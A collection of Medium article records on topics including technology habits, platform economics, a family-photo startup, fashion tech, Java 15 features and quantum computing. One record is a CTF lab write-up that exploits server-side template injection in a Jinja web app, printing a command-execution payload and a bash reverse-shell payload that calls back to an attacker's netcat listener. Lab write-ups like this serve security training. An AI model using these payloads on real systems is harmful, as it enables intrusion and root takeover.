Click here to know more about features an online education platform must have | https://medium.com/@kitaboo/10-must-have-features-of-an-online-education-platform-kitaboo-8f6accd12718 | [] | 2019-11-15 12:50:15.806000+00:00 | ['Education', 'Online Learning', 'Education Reform', 'Digital Learning', 'Education Technology'] |
157 | Secrets To Make Technology Serve You | “It’s hard to say exactly what it is about face-to-face contact that makes deals happen, but whatever it is, it hasn’t yet been duplicated by technology.” –Paul Graham “Blow up your TV, throw away your paper…” –John Prine
This strategy and action section offers some ideas to help curate, filter, and synthesize technology. Feel free to use these ideas, discard them, or put your own spin on them.
Television Mastery
The idea to master our use of television starts with placing a buffer between us and the content from our television. Cable TV is largely a gateway to reruns, commercials, or news. By eliminating cable, we effectively set up a buffer between our minds and advertising-based content. Now we can take control of the technology and add an application to our television to synthesize what we take in. An example might be to connect our television to the Internet, or link it up to Netflix, Amazon Video, or a Google Chromecast. Now, we have a barrier where we’re forced to make a conscious decision about selecting what to watch instead of just turning on the television and consuming.
Computer Mastery
Rescue Time: This app lets us turn the Internet on our computers on and off for a predetermined length of time. I like to use Rescue Time to turn off the Internet on days like today, when I’m writing and don’t want the temptation to start looking things up online that can interfere with my work. Rescue Time helps filter out the noise which would degrade our willpower first thing in the morning. When we control the Internet on our devices, we make conscious choices about how we’ll use it.
The Game Changer
The most valuable ways I’ve found to control and drive my use of a Smartphone and laptop are as follows:
At night, before bed, I create a to-do list for the next day on a 4x6 note card.
From that list, I will select or write in the three most important things to do. The idea is that if I get nothing else done, and only complete these three things, I would still make progress towards a goal or outcome I want to create.
The next day, before I do anything online, before I even TOUCH my Smartphone, I do those three things. No outside stimulus until they’re done.
This is a simple way to get where we want to go, without derailing ourselves or chipping away at our willpower first thing in the morning. This is an act of defiance towards always being connected; it’s a way to refuse to be a servant of technology.
Content Curation and Filtering Online
Feedly: This app brings all the feeds from your favorite websites into one place where you can read or share select articles and content. Simply login and add the specific sites you want to get news and updates from. The app doesn’t bring in advertisements, so you’re able to read things without constantly seeing display advertising. If you’re learning something, or trying to break into a new industry, simply add those websites of curated content from influencers into your Feedly. Over time, you can use Feedly to build a custom stream of highly relevant, amazingly useful content which will save you hours of time.
Upside Exposure: The best and most scalable way to increase our exposure to opportunities is to set up online social media accounts on Twitter and LinkedIn. Depending on your industry, using Medium might be helpful, but we don’t need to worry about that for now. These accounts allow us to capitalize and create opportunities where we are using technology instead of it using us. If you don’t have a personal website at this point, don’t worry. LinkedIn can hold your resume and be the hub of your online presence, while Twitter is a more specific opportunity generator.
An opportunity generator is something we set up which can advertise and promote ourselves while we’re not directly working. In business, we might call the creation of these opportunities “lead generation.” In our personal lives, many people just call this smart. Many people have grandparents who told them to never look for a job, but always look for an opportunity. Having social profiles set up to work on our behalf to uncover and expose us to opportunities would make our grandparents proud.
Platforms as Opportunity Generators
By investing small amounts of time into building or improving opportunity generators, we can reap huge rewards. These rewards may include: new friends, business connections, job offers, expertise requests, help with starting a business, and much more. The idea is to interact with others, send cold emails, write articles in our industry, and link them back to the platforms containing our resume, proof of skills, or even work that shows proof of our imagination.
Twitter: You don’t have to tweet, but by having this set up, you’ll be able to claim your name and prepare for when/if you do tweet. Just sign up and post a single tweet. This helps in case anyone on Twitter searches for your name, and this single tweet can direct interested parties to the appropriate place.
“Thanks for stopping by! Too busy to tweet at the moment, but let’s connect (link to your email address or your LinkedIn profile).”
The link to connect can go to the places we mentioned above, or to your profile at your current company, your personal website, or even a short 30- to 60-second video introducing yourself, your skills, and, if you’re a job-seeker, what you’re looking for.
LinkedIn Profile: If you’re looking for a job, opportunity, or promotion, this is the place to start. Recruiters scour LinkedIn all day long looking for applicants. There are a million free resources online showing how to optimize your LinkedIn profile, so I won’t bore you with details here.
The idea is to set up a LinkedIn profile and, over time, add more than 500 connections. The LinkedIn publishing platform is still in its infancy, and it’s a great time to use it to begin writing industry-specific articles. The publishing platform will likely grow even larger and more esteemed as time goes on. Getting involved now and having a public place such as your LinkedIn profile to write and become noted in your industry is a great way to generate opportunities and serendipitous connections.
If you need a job, make sure your LinkedIn profile is cleaned up and your resume is posted. Then, on LinkedIn’s publishing platform, write a post titled something along the lines of “Ten Things I Didn’t List on My Resume.” Include everything, such as stories or decisions which have built your character.
You can follow up that post with “10 Reasons I’m Ready to Work at (company name here),” citing what you bring to the table. Or something like “10 Ways For (company name here) to Increase Their Sales.” The idea is to stand out from the traditional channels of resume spamming and find opportunities before they’re advertised to the market.
LinkedIn’s long-term goal is to turn up contextual economic opportunities for the right people, at the right time. If you’re not 100% sure what this means, look it up and write a post about why the long-term vision of LinkedIn is important. If you get it right, LinkedIn will likely want to promote your writing. If you’re a horrible writer, record what you want to say and have it transcribed, or hire an editor on Upwork to proofread your work. LinkedIn is a platform which can unlock thousands of opportunities.
Personal Website: This isn’t needed at first, but for specific creative types (artists, designers, or engineers), this might make sense. The credentials of the future involve being able to cite proof of skills at a moment’s notice to show a potential employer, friend, or business partner. Creating a personal website by using an incredibly cheap and full-service solution provider like Squarespace is perfectly suited to showcase our proof of skills.
Launching a personal website is also a great excuse to grab the domain name for your name. Most .com domains will be taken, but there is a good chance you might be able to find a .co or suitable alternative such as (www.YourFirstName-YourLastName.com). If you want to blog or start a business and sell products or services from a personal site, Squarespace lets you sell digital products and services using the awe-inspiring payment processor, Stripe.
A Few Notes on Platforms
Ensure congruence across platforms. Make sure that all your social media profiles display the message you want to convey. For the advanced folks, or those who already have LinkedIn and Twitter accounts set up and are using them well, you can consider other opportunity generators such as Medium or AngelList.
AngelList will be incredibly useful as we dive into reverse engineering entry into high-growth technology fields in the next article, so if you’re interested in this, consider setting up a profile there.
Medium: This is where you can write about certain industry or life-specific topics and give those writings exposure to a large audience. This is an alternative or supplement to publishing on LinkedIn, and might be a bit more useful to those interested in startups, technology, design, art, or writing.
AngelList: This is where you can learn all about startups and technology businesses and discover how to land jobs with them. If you’re a qualified angel investor, you can start looking for companies, funds, or syndicates for investment. Anyone interested in technology should become familiar with this site. AngelList is the best platform on the Internet to connect early-stage businesses with funding and employees. They’re also building index funds for investing and are beginning to raise large amounts of money to invest in startups. You can always find where the future of industries are heading by studying where investment dollars are going on AngelList.
All of these platforms we have mentioned can become opportunity generators if used appropriately. Once you’re set up, at least on LinkedIn and Twitter, you’ve embraced the mindset of exposing yourself to good things. Now, when you start seeking out opportunities, you have an online presence to capture opportunities and introductions as you go. | https://medium.com/the-mission/secrets-to-make-technology-serve-you-f2300e6c7a67 | ['Chad Grills'] | 2018-07-05 17:27:59.364000+00:00 | ['Media', 'Life', 'Culture', 'Technology', 'Marketing'] |
158 | CTF [Dec 11–15]: Pwn a buggy webapp in 5 minutes | In this post, I will be talking about an intentional bypass that allows you to get root and solve the whole WebApp Security CTF under 5 mins!
Try the challenge yourself: https://attackdefense.com/challengedetails?cid=2160
Note: If you want a organized solution where all the flags are retrieved in the order, then take a look at the manual.
Scenario:
We get a Code IDE webapp that shows a login page:
Code IDE webapp
Hacking our way in!
Enter any random credentials and try to login:
Login attempt using some random credentials
Note: Use Burp proxy to intercept all the requests.
Notice that the request goes to port 8000 of the target machine!
Let’s try and access the API in the browser:
Uh no! Page Not Found :/
Try to access some random page:
Oh nice! Page name gets reflected
Awesome, so the page name gets reflected in the response.
Check the response of the above request in the HTTP History tab in Burp:
Response indicates of Python (Werkzeug) backend
The backend is Python-based (Werkzeug WSGI utility is used)!
Try to see if the page is vulnerable to SSTI (Server-Side Template Injection):
URL: 192.248.251.3:8000/{{7*’7'}}
Awesome! The backend is vulnerable to SSTI
The response makes me really happy! The backend is vulnerable to SSTI and it is probably using Jinja template at the backend!
Try running shell commands now:
SSTI Payload: {{config.__class__.__init__.__globals__[‘os’].popen(‘ls’).read()}}
Fantastic! We can execute shell commands as well
Next step would be to get a shell session!
Getting the IP address of the attacker machine:
Checking the IP address of the attacker machine
Start a netcat listener on the attacker machine to receive back the shell session:
Started a netcat listener on port 4444 on the attacker machine
Send the following SSTI payload to the backend API:
SSTI Payload: {{config.__class__.__init__.__globals__[‘os’].popen(“bash -c ‘bash -i >& /dev/tcp/192.248.251.2/4444 0>&1’”).read()}}
Notice the terminal where the netcat listener was started:
Wow! Is that a root shell :D
Yes we are root!
Now its just simple from here… Just use grep and find commands and take out the flags :D
The database credentials can be found in the backend API code and that would let you get the root credentials.
Also, there was one more flaw - | https://blog.pentesteracademy.com/webapp-security-ctf-dec-11-15-pwning-under-5-mins-df26d61fc36c | ['Shivam Bathla'] | 2020-12-17 15:03:43.400000+00:00 | ['Ctf', 'Security', 'Information Technology', 'Cybersecurity', 'Hacking'] |
159 | The Platform Matrix: Not All Platforms Are Created Equal | The Platform Matrix: Not All Platforms Are Created Equal
Image credit: Shutterstock
I have previously explained how network effects shape three broad types of tech businesses — marketplaces, interaction networks and data networks. In addition to these, there is one other type of business where network effects play a central role — platforms. Unfortunately, the tech and startup world has spent much of the past decade using the term “platform” to describe everything from operating systems to analytics tools, algorithms, APIs, etc. Quite plainly, if everything is a platform, then nothing is and the term loses all meaning. So let’s take a more granular look at what platforms really are, and then unpack how their network effects work.
What is a platform?
The most meaningful definition of a platform comes from none other than Bill Gates, the architect of one of the first true platform businesses.
“A platform is when the economic value of everybody that uses it, exceeds the value of the company that creates it” — Bill Gates (as relayed by Chamath Palapithiya)
Focusing on economic value to external participants automatically eliminates the vast majority of companies that call themselves platforms. For example, Tableau is a data visualization and analytics tool, but not a platform. However, Xbox, iOS, Android, Salesforce, Shopify, and even Roku are all platforms because they help third-party developers generate economic value on top of their businesses. In order to unlock this economic value, aspiring platforms need to have the following components:
Underlying product: Platforms are always built on top of an existing product with some standalone value. For example, iOS and Android were smartphone operating systems that had self-contained features (phone, text, web browser, etc.) even before developer activity took off. Development framework: One of the most basic requirements for any platform is that it must allow third-party developers to leverage the platform’s capabilities to create software products for platform users. Matching: Modern platforms create an avenue for developers to distribute apps and help platform users discover apps that meet their needs. Enabling discovery is especially important because platforms own the primary relationship with customers or users. Economic benefit: Finally, platforms provide economic benefits to developers and help them build, monetize, or enhance their businesses on top of the platform. These benefits can be either direct (earning revenue from the platform) or indirect (improving engagement or retention via the platform).
In summary, platforms combine an underlying product and the development capabilities of software frameworks with the matching and monetization functions of marketplaces.
Platform = Underlying Product + Development Capabilities + Marketplace
As a result, platforms have some similarities with marketplaces. For example, customer and developer fragmentation is critical for them to be viable. Also, platforms have cross-side network effects, i.e. the addition of each developer makes the platform more valuable for all users and vice versa. This feedback loop makes them more valuable as user and developer adoption grows.
Now that we understand the basics of platforms, let’s take a deeper look at how platform network effects work.
Scalability: Platform Focus
I previously evaluated the scalability of marketplaces based on the geographic range of their network effects, i.e. the maximum physical distance between demand and supply for interactions to take place. Marketplaces with cross-border network effects are significantly more scalable than hyperlocal ones because they can leverage a supplier in one region to attract demand in another. However, we cannot use this approach to compare the relative scalability of platforms because they are purely digital businesses, i.e. their network effects are almost always cross-border. The addition of a developer in one region makes the platform more valuable for users all over the world, and vice versa.
If platforms are cross-border by nature, their scaling potential should depend on their ability to organically expand into adjacent vertical markets or categories (not regions). In other words, scalability depends on the breadth of the platform’s standalone capabilities.
Take Xbox as an example — the underlying capabilities of the platform (processing power, graphics, controller) were designed for gaming. This focus and a growing base of game developers led to strong customer adoption, primarily from gamers. With the launch of the Xbox One, Microsoft attempted to expand this gaming platform to a larger market — home entertainment. However, media was a small minority of the platform’s value for its customer base. In addition, the Xbox One could not justify its price premium over competing streaming devices to non-gamers as its unique capabilities, and developer base did not appeal to that market. As a result, Xbox could not expand their market or gain market share against other dedicated streaming devices.
Game consoles and entertainment platforms like Roku are the clearest examples of focused platforms, but they are not the only ones. In recent years, there have been a number of specialized SaaS tools that have launched their own developer programs and app stores. This includes Slack, Zoom, Okta, and Zendesk. They still meet the definition of platforms, but their developer programs are largely restricted to the specific use case of the underlying product.
This means that the most scalable platforms are those that are multi-purpose, with capabilities that can enable a wide array of potential use cases.
Both iOS and Android (combined with Google Play) are great examples here. As smartphone operating systems, they have always enabled a wide variety of functions. For example, the first iPhone and the T-Mobile G1 (the first Android smartphone) both launched with roughly 15 pre-loaded apps, including YouTube and maps. As a result, they attracted customers who used them as multi-purpose platforms. This initial customer base, combined with a rapidly expanding collection of APIs then helped them attract developers across a range of different categories, from gaming to social media, e-commerce, health, finance, and so on. In other words, they leveraged their capabilities to enter adjacent categories and evolve from mobile computing platforms to general-purpose computing platforms.
Multi-purpose platforms are not limited to computing. SaaS tools like Salesforce and Shopify have become essential infrastructure for their customers’ operations and effectively act as operating systems for business. This allows them to create scalable, multi-purpose developer platforms as well.
Defensibility: Role of Developers
The defensibility of a marketplace is a function of how differentiated its supply is. Marketplaces with commoditized or interchangeable supply (like Uber) are less defensible, see higher multi-tenanting, and face more competition. Unfortunately, this framework is not directly applicable here either because all platforms have varying degrees of differentiated supply. Users look for apps that meet specific and varied needs, and they cannot automatically be substituted for one another. However, platforms are still vulnerable to competition and multi-tenanting, i.e. developers can use more than one platform. The scale of this risk depends on the importance of the platform to a developer’s business.
Take Slack for example. Slack’s app directory includes a range of apps that customers can use to improve their experience. However, the vast majority of popular apps are not actually “native”, i.e. built on top of Slack from scratch. Rather, they are “connections” or “integrations” to pre-existing apps.
The motivation for these developers is to make it easier for customers to use their apps in any context, i.e. improving their UX. For example, Asana is one of the most popular Slack integrations and allows users to convert Slack messages into tasks on Asana or link Asana projects to specific Slack channels. This makes it much more convenient for both Asana and Slack customers. However, this also means that developers are motivated to integrate their apps with any product that their customers use frequently. In addition, the platform is not a necessity for their app to exist and it is relatively simple to extend “connections” to other platforms. This leads to extensive multi-tenanting. For example, Asana is also available on Microsoft Teams, Hangouts Chat, Glip, and Flock. And, of course, connectors like Zapier enable integration with even more collaboration tools.
In addition, “long tail” developers are less important since integrations are meant to complement the use case of the underlying product (and not create new use cases). As a result, competing platforms only need to have integrations with the most popular apps to create a “good enough” alternative. This isn’t to say that these integrations don’t create some switching costs — customers would need to set up all of their integrations again if they switch platforms. However, the wide availability of popular integrations reduces barriers to switching and weakens defensibility. Both Slack and Zoom rely on “connections” or “integrations” rather than native apps. Luckily, Slack has other forms of network effects that insulate it against competition. Unfortunately, Zoom does not.
In contrast, Salesforce is an example of a platform that skews towards native apps over integrations. Salesforce acts as a single source of truth recording data about customer interactions and business operations. Developers leverage its capabilities and recorded data to build new, native apps that extend the functionality of the platform.
The motivation for developers here is to target new market opportunities and acquire new customers. Take Vlocity for example — it built a billion-dollar business by creating customized, industry-specific solutions on top of Salesforce. This extended the use cases of Salesforce’s platform to areas as diverse as claims management in insurance and subscriber management in media streaming. Crucially, it was exclusively built on Salesforce. Vlocity would need to rebuild their application from scratch if they wanted to reach customers using another CRM. This acts as a barrier to multi-tenanting and limits competition.
Clearly, “long tail” developers are exceptionally important here because the whole point of these developer programs is to create functionality that the platform cannot build itself. As a result, competitors need to match the scale of the incumbent platform to provide a comparable experience. This makes network effects exceptionally strong, with first movers locking out later competition. For example, iOS and Android were first to create network effects between developers and smartphone users, which doomed late movers like Windows Phone. While there is extensive multi-tenanting between iOS and Android, this is because they were both essentially first movers targeting different market segments — Android’s modular approach allowed it to penetrate markets that iOS simply could not reach.
The Platform Matrix: Extreme Outcomes
As we have done previously, we can now plot defensibility and scalability against each other to create a framework for evaluating platform network effects. This shows a remarkable pattern that is effectively an inverse of the catch-22 we saw with data network effects. The majority of platforms are either both scalable and defensible, or neither.
The cause of this pattern is simple. Multi-purpose platforms create more opportunities for developers to discover new use cases, which leads to a larger market for native apps. This also creates exceptionally strong and defensible network effects as the value of the platform continues to grow with user and developer adoption. This is not only true for iOS, Android, and Salesforce, but also for Shopify, WeChat’s Mini Programs, and even Atlassian.
On the other hand, the limited capabilities of focused platforms restrict new market opportunities and constrain native app development. These platforms have significantly weaker network effects but do create some switching costs. On the flip side, they are much easier to build because the use cases and complements already exist. Roku, Zendesk, Okta, RingCentral fall into this category in addition to Slack and Zoom.
Building a platform is rarely a near-term option for early-stage startups because attracting third-party developers requires some level of scale. However, by the time that scale is achieved, it is too late to choose the type of platform you want to build. At that point, the capabilities of the underlying product are already defined. If building a platform is the eventual goal, its desired capabilities need to be the core philosophy guiding your long-term product roadmap right from the start. | https://breadcrumb.vc/the-platform-matrix-all-platforms-are-not-created-equal-f8c8b5100858 | ['Sameer Singh'] | 2021-03-01 10:01:47.508000+00:00 | ['Venture Capital', 'Platform', 'Technology', 'Startup', 'Business'] |
160 | Sunday, where family stories make the difference | Sunday is a family story. Four years ago, my siblings and I found ourselves in different corners of the world — my sister in China, my brother in London and I was in New York. Our grandmother was in a nursing home with little way to communicate with the family. She did not use social media like us grandchildren, so we developed a solution that bridged the generation gap. Sunday is a smart object that plugs into the TV and broadcasts photos and videos shared by friends and family via the web or mobile application. This quickly became her favorite TV channel.
The usual platforms used for sharing content, such as Facebook or Flickr, are designed for people that are tech savvy thus leaving the rest of the world on the sidelines. Sunday is a simple solution helping to maintain healthy relationships and a simple solution for healthcare professionals too. Nursing homes, hospitals and clinics use Sunday to share content with their patients and residents. Families are also able to send photos and videos to their loved ones while under the care of health professionals. | https://medium.com/@nellymeunier/sunday-where-family-stories-make-the-difference-d6cf7fa3da53 | ['Nelly Meunier'] | 2019-06-09 14:38:13.587000+00:00 | ['Startup Life', 'Healthcare', 'Technology', 'Startup', 'Storytelling'] |
161 | Modernization Mistakes and How to Avoid Them | When it’s time for your business to go through the modernization process, there are some common mistakes that you need to avoid. These mistakes will not only provide setbacks, but will make your systems more fragile. In turn the mistakes tally up extra expenses to fix the problems, and can result in lost revenue and potentially lost customers.
One of the biggest mistakes in modernization is not giving the process proper attention and focus. The person or people you’ve hired to do the job but don’t finish it, or they decide to do one system at a time and piece meal, maybe it’s even a side project. Not focusing resources an modernizing one system at a time will result in your business being in a constant state of modernization because once you finish with the last system, the first system that was modernized is no longer current and needs to be modernized again. The result is a never-ending cycle of constantly upgrading systems, which ends up being costly and adds fragility. Ensuring that modernization occurs across all systems simultaneously or in a dedicated amount of time, and that the job is completed, is a big factor in the success of the modernization process.
Another mistake is approaching modernization with a lack of expertise around the new and old systems. A non-expert might try to adjust the code base in one place, but lack understanding and actually end up making the system more fragile in another. It’s common for coding languages to be updated and certain functions be deprecated for security, which in turn means the code base needs to be updated to work. But if the person doing the modernization doesn’t know or understand why the changes are necessary, then anything they do to adjust the code could make the system more fragile. They could even reopen the same security issues by using the same methods while side stepping the security fix using different functions, which is worse because now you are vulnerable and don’t know it.
***Click here for full text*** | https://medium.com/@pwvconsultants/modernization-mistakes-and-how-to-avoid-them-f5448d5881d8 | ['Pwv Consultants'] | 2020-10-13 22:36:51.206000+00:00 | ['Security', 'Modernization', 'Information Technology', 'Information Security', 'Fragility'] |
162 | Technology is eating fashion | This op-ed was originally published in Business of Fashion (https://www.businessoffashion.com/articles/opinion/op-ed-technology-is-eating-fashion) on 31 August 2017.
Fashion companies that don’t embrace technology are sitting ducks just waiting to be picked off by sharp-shooting software companies.
If you think you run a fashion business, you’re wrong. A technology business with a fashion focus? Sure. Anything else and you may as well wave the white flag because the rules of the rag trade are changing. You’re either leading that change, or you’re a sitting duck ready to be picked off by a sharp-shooting tech juggernaut.
Since Amazon first started peddling books online, Jeff Bezos never once saw his company as a retailer. “Amazon is a technology company. We just happen to do retail,” said Amazon CTO Wagner Vogels in 2011. With this mentality it’s no surprise Amazon has been able to conquer retail category after retail category, solving long-old supply-chain inefficiencies using technology as the not-so-secret weapon.
From product development to distribution, nothing about the fashion supply-chain is agile. It’s impossible for traditional fashion businesses to respond to real-time demand; it takes too long to get ideas to market. Even Zara, the masters of supply-chain efficiency, can only bring a product to market in 10–15 days. In our hyper-connected digital world, a lot can change in 15 minutes let alone 15 days.
The supply-chain also fails with personalisation. Products must be designed to appeal to markets broad enough to justify producing at scale, sacrificing individualisation for unit economics. Then there’s the fit issue. Standard sizes statistically fit less than 20 per cent of the total addressable population. Too many consumers fall between the cracks of standard sizing bell-curves.
These shortcomings are being aggressively addressed by tech companies. Amazon for one has been mining its retail data and spinning up private labels to exploit product gaps discovered in the apparel market. In April 2017 the company was granted a patent for an on-demand apparel manufacturing system that creates custom clothing to the fit and specifications of individual customers. This means Amazon can not only eliminate inventory, but can respond almost instantly to market trends, and sell their products to the entire population.
Los Angeles-based Fame and Partners is another pioneer in the on-demand apparel supply chain. Like Amazon, the online womenswear label has developed a proprietary factory floor system with their manufacturing partner near Shanghai. CEO Nyree Corby says Fame and Partners use a modular design approach, allowing them to create new styles tied to their pattern and factory floor systems, which in turn maximises design flexibility, fit, and manufacturability. Corby says the rise of direct to consumer labels “translates to a larger proportion of brands now taking inventory risk than their business models previously allowed for.” She adds that reduced barriers for new fashion labels going to market “is driving fragmentation of trends and contributing to the general retail malaise.”
As consumers and their expectations digitally evolve, so too must the companies that clothe them. It’s not viable for fashion companies to design products for market segments when tech companies can design products for specific individuals. It’s not viable for fashion companies to spend weeks or months bringing products to market if tech-companies can do the same in seconds.
Technologies like data mining, machine learning, pattern bootstrapping, and product virtualisation are the tools of the new game. Tools that are already bolstering the arsenal of tech retailers like San Francisco-based Stitch Fix. They use artificial intelligence to analyse and predict purchasing behaviour and formulate new product designs based on what components of style are popular at the time. Their AI-design technology sorts through trillions of design and fabric variants to generate products that have a statistically-high chance of retail success.
Human designers cannot compete with AI-designers when it comes to synthesising complex data from multiple sources. They also can’t compete with AI-designers to action their findings and assemble, render, and launch entirely new products in seconds. A consumer may soon be browsing an eCommerce site as an AI-designer watches and learns from their actions. The machine could design, render, and display new products to the consumer in real-time based on what it believes they want. The product could then be manufactured only after the consumer has purchased the product, eliminating inventory risk.
This supply chain revolution doesn’t only apply to mass-market fashion brands. Luxury brands cannot claim superiority when tech-driven mass-market players can guarantee a more personalised and better-fitting product.
Technology also shifts the creative process towards a more symmetric interaction between consumers and brands. With AI, brands have the scalability to use individual customers as the basis of inspiration for designs. H&M’s Ivyrevel has collaborated with Google to translate “a week of your life into a one-of-a-kind design.” Lifestyle data is collected through an Ivyrevel app, including tracking venues they visit and activities they do. The app learns “who you are, what you like to do, and where you like to go,” and then proposes a unique dress design for a specific occasion.
This might sound like a novelty, however, it’s just the beginning of a movement where technology begins to inform the creative process. To remain at the cutting-edge, luxury brands must learn to harness AI to pioneer new and meaningful experiences with consumers.
Fashion businesses need to start their transition into technology companies now. The sooner they start, the sooner they’ll cultivate the domain expertise required to remain competitive in the future. Firstly, digitise historical designs and build a rich database of products split into their individual variants. When properly organised, a human or AI designer can easily reference this library to assemble a unique product without having to create anything from scratch.
Secondly, ditch standard-size grading and adopt parametric pattern grading. With parametric grading any product design can be made to fit any body type. It is getting easier and easier to capture customer body data, from taking 3D body scans on smartphones to predicting 50+ measurements from a few questions about fit. It’s only a matter of time before the mass market falls for a bespoke fit, and you don’t want to be dependent on standard sizes when that time comes.
With parametric grading and bespoke fit comes the third recommendation: supplement your mass-produced inventory with on-demand production. You can quash sizing-related problems, eliminate unsold inventory headaches, and be responsive to consumer demand on a sale-by-sale basis. A low-barrier-of-entry approach would be to leverage pre-sales as a way to collect a critical mass of orders before producing custom products at scale.
Finally, start collecting and analysing all the data that you have, such as point-of-sale data, e-commerce analytics and metrics about your customers. Whatever you have, collect it. Your biggest competitive advantage is locked away in the data that flows through your business, day in day out. Build infrastructure around your data to analyse and take action on the findings. Your business’ survival depends on it. | https://medium.com/bespokify/technology-is-eating-fashion-7341fcbea74d | ['Marc C. Close'] | 2019-11-15 06:06:04.055000+00:00 | ['Fashion', 'Fashion Technology', 'Apparel', 'Technology', 'Startup'] |
163 | What’s new in Java 15 | JDK 15 is the open-source reference implementation of version 15 of the Java SE Platform, as specified by JSR 390 in the Java Community Process.
JDK 15 reached General Availability on 15 September 2020. Production-ready binaries under the GPL are available from Oracle; binaries from other vendors will follow shortly.
The features and schedule of this release were proposed and tracked via the JEP Process, as amended by the JEP 2.0 proposal. The release was produced using the JDK Release Process (JEP 3).
Removals
Solaris and SPARC Ports
The source code and build support for the Solaris/SPARC, Solaris/x64, and Linux/SPARC ports were removed. These ports were deprecated for removal in JDK 14 with the express intent to remove them in a future release.
Nashorn Javascript Engine
The Nashorn JavaScript script engine and APIs, and the jjs tool were removed. The engine, the APIs, and the tool were deprecated for removal in Java 11 with the express intent to remove them in a future release.
Deprecations
RMI Activation
RMI Activation mechanism is deprecated. RMI Activation is an obsolete part of RMI that has been optional since Java 8. No other part of RMI will be deprecated.
What's new
Helpful NullPointerExceptions
Usability of NullPointerException has been improved. Messages generated by the JVM are describing precisely which variable was null .
Before Java 15
In Java 15
Text Blocks
A text block is a multi-line string literal that avoids the need for most escape sequences, automatically formats the string in a predictable way, and gives the developer control over the format when desired.
Before Java 15
In Java 15
JVM Improvements
ZGC Garbage Collector
The Z Garbage Collector (ZGC) is a scalable low latency garbage collector. ZGC performs all expensive work concurrently, without stopping the execution of application threads for more than 10ms, which makes it suitable for applications that require low latency and/or use a very large heap (multi-terabytes).
At a glance, ZGC is:
Concurrent
Region-based
Compacting
NUMA-aware
Using colored pointers
Using load barriers
At its core, ZGC is a concurrent garbage collector, meaning all heavy lifting work is done while Java threads continue to execute. This greatly limits the impact garbage collection will have on your application’s response time.
Beginning from a Java 15 it is a production-ready GC.
Hidden Classes
Classes that cannot be used directly by the bytecode of other classes. Hidden classes are intended for use by frameworks that generate classes at run time and use them indirectly, via reflection. A hidden class may be defined as a member of an access control nest and may be unloaded independently of other classes.
EdDSA
EdDSA is a modern elliptic curve signature scheme that has several advantages over the existing signature schemes in the JDK.
DatagramSocket API
Replacement for the underlying implementations of the java.net.DatagramSocket and java.net.MulticastSocket APIs with simpler and more modern implementations that are easy to maintain and debug. The new implementations are easy to adapt to work with virtual threads, currently being explored in Project Loom.
Preview Features
A preview feature is a new feature whose design, specification, and implementation are complete, but which is not permanent, which means that the feature may exist in a different form or not at all in future JDK releases.
Pattern Matching
Pattern matching involves testing whether an object has a particular structure, then extracting data from that object if there’s a match. You can already do this with Java; however, pattern matching introduces new language enhancements that enable you to conditionally extract data from objects with code that’s more concise and robust.
More specifically, JDK 15 extends the instanceof operator: you can specify a binding variable; if the result of the instanceof operator is true , then the object being tested is assigned to the binding variable.
Records
Introduced as a preview feature in Java SE 14, record classes help to model plain data aggregates with less ceremony than normal classes. Java SE 15 extends the preview feature with additional capabilities such as local record classes.
A record class declares a sequence of fields, and then the appropriate accessors, constructors, equals , hashCode , and toString methods are created automatically. The fields are final because the class is intended to serve as a simple "data carrier". It means that records are Immutable.
Sealed Classes
Sealed classes and interfaces restrict which other classes or interfaces may extend or implement them.
One of the primary purposes of inheritance is code reuse: When you want to create a new class and there is already a class that includes some of the code that you want, you can derive your new class from the existing class. In doing this, you can reuse the fields and methods of the existing class without having to write (and debug) them yourself.
Before Sealed Classes
With Sealed Classes
Conclusion
In this article, we have checked what was added and removed in Java 15. And how all the changes that were delivered with a Java 15 can improve your existing projects. | https://medium.com/javarevisited/whats-new-in-java-15-70335926cc42 | ['Dmytro Timchenko'] | 2020-11-21 06:19:25.188000+00:00 | ['Technology', 'Software Engineering', 'Programming', 'Software Development', 'Java'] |
164 | What Could Make Quantum Computing Easy to Explain? | In a recent Quanta article, What Makes Quantum Computing So Hard to Explain?, Scott Aaronson cautions,
“To understand what quantum computers can do — and what they can’t — avoid falling for overly simple explanations.”
That’s great advice, but it is also kind of vacuous since you could say the same thing about digital computers, or a toaster for that matter. The problem with the explanations of quantum computing as they exist today is not that they are overly simple — it is that they are overly detailed. Google “how does a quantum computer work,” and you are met right out of the gate with qubits and parallel universes, spooky action at a distance, exponential growth, and — wow — no wonder people are confused.
The entire premise of the statement above is that someone wants to know what quantum computers can do — for them. Yet, quantum computer scientists feel compelled to talk about superposition and entanglement. While it is fine to talk about superposition and entanglement — I’ve stopped people on the street to talk about quantum physics — that’s not what people need to hear about quantum computing through casual Google searches. Aaronson himself makes an attempt in the article to explain quantum computing that avoids his own criticism:
“So a qubit is a bit that has a complex number called an amplitude attached to the possibility that it’s 0, and a different amplitude attached to the possibility that it’s 1.”
This is absolutely 100% correct , but I’m going to wager that this means nothing to someone who didn’t already know that. What is going on here? Why do we try so hard to explain every detail of quantum physics as if it is the only path to understanding quantum computation? The answer partially lies in the illusion of explanatory depth. We have this illusion that we understand things we know how to use. But we don’t. Think about it. Do you know how a computer works? A toaster? A doorknob? If you think you do, try to explain it. Try to explain how you would build it. Use pictures if you like, but I think you will quickly change your mind about how much you thought you understood about even simple technology.
We don’t use quantum computers, so we don’t have the illusion we understand how they work. This has two side effects. The first is that we (the quantum scientists) think conventional computing is generally well-understood or needs no explanation. The second is that we (the quantum scientists again) accept the idea that quantum computing is hard to explain. In turn, this causes us to try way too hard at explaining it, hoping the listener will feel as comfortable with quantum computing as they do with their smartphones.
To see why the “try too hard” approach is a problem, consider an analogy. Imagine our curious friend wants to know what a digital computer can do. Apparently, what the quantum computer scientist would do is start talking about bits of information, logical operators, stored-program architectures, and so on, expecting that the listener would easily connect these concepts together and deduce that the UberEats app is possible. But this is, of course, silly. Instead, what you would want to do is say, “Have you ever ordered food using your smartphone? OK. Let’s explore how your intention to get a nice kale salad gets interpreted by the computer on your phone…”
An even better analogy is the other hot deep-tech topic of artificial intelligence. Search for “what is AI,” and most legitimate explainers will state a generically vague answer and then spend most of the words detailing the existing and future applications. The vague answer given is usually something along the following lines — an AI is an autonomous machine that can learn from known examples and makes generalizations that work for unfamiliar examples. Then, the article will go on to say that AI is used in your digital assistant, to recognize faces in photos, to detect spam, and so on. The reader comes away happy that they know — insomuch as anyone with eight minutes of reading can know — what AI can do.
(By the way, if all someone came here for is an eight-minute read about quantum computers, try this instead.)
